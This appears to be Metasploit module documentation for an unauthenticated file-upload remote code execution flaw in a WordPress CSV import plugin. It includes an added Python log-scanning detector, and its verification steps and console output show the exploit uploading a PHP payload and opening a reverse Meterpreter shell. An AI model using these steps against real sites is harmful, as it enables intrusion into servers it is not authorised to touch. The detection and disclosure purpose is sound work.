## Vulnerable Application

The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload handler neither requires authentication nor validates the uploaded content. It may return an error when it attempts to parse the file as CSV; however, the uploaded shell is left in place. The shell is written to `wp-content/uploads/`.

The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/. Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.
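As an added defensive example (not part of the module documentation): because the shell is dropped into `wp-content/uploads/` and, as the scenario output below shows, deleted again once the session is up, the web server access log is often the only durable artifact. The script flags any request for a PHP-like file under that directory; the combined-log regex and the sample lines are constructed for this example.

```python
import re
from typing import Dict, List

# Apache/nginx "combined" access-log layout; we only need client, method, path and status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# wp-content/uploads/ should only ever hold media; any server-side script there is suspect.
UPLOADS_PHP_RE = re.compile(
    r'^/wp-content/uploads/.*\.(?:php\d?|phtml|phar)(?:$|[?/])', re.I
)

# Constructed sample log: one benign login, the dropped shell being triggered,
# a normal image fetch, and a later request after the shell was removed.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2021:11:56:10 -0500] "GET /wp-login.php HTTP/1.1" 200 3125 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2021:11:56:15 -0500] "GET /wp-content/uploads/W1I6X0.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.3 - - [01/Jan/2021:11:57:02 -0500] "GET /wp-content/uploads/2021/01/logo.png HTTP/1.1" 200 8213 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2021:11:58:40 -0500] "GET /wp-content/uploads/W1I6X0.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
""".splitlines()


def flag_uploads_php(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request for a PHP-like file under wp-content/uploads/."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        path = m.group("path")
        if UPLOADS_PHP_RE.match(path):
            status = m.group("status")
            findings.append({
                "client": m.group("client"),
                "method": m.group("method"),
                "path": path,
                "status": status,
                # 2xx means PHP ran (or the file was served); 404 means it was already gone
                "executed": status.startswith("2"),
            })
    return findings


if __name__ == "__main__":
    for f in flag_uploads_php(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['path']} -> {f['status']} executed={f['executed']}")
```

A 404 for a `.php` path under uploads is still worth an alert: it usually means the file existed earlier and has since been cleaned up, exactly the pattern the module's "Deleted" line produces.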
## Verification Steps

- Install the plugin
- Start msfconsole
- Do: `use exploits/multi/http/wp_ait_csv_rce`
- Do: `set rhost [ip]`
- Do: `set lhost [ip]`
- Do: `run`
- You should get a shell.
## Options

## Scenarios

### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04

```
[*] Processing ait.rb for ERB directives.
resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (ait.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (ait.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ait.rb)> check
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (ait.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload: W1I6X0.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
[+] Deleted W1I6X0.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : wordpress2004
OS : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```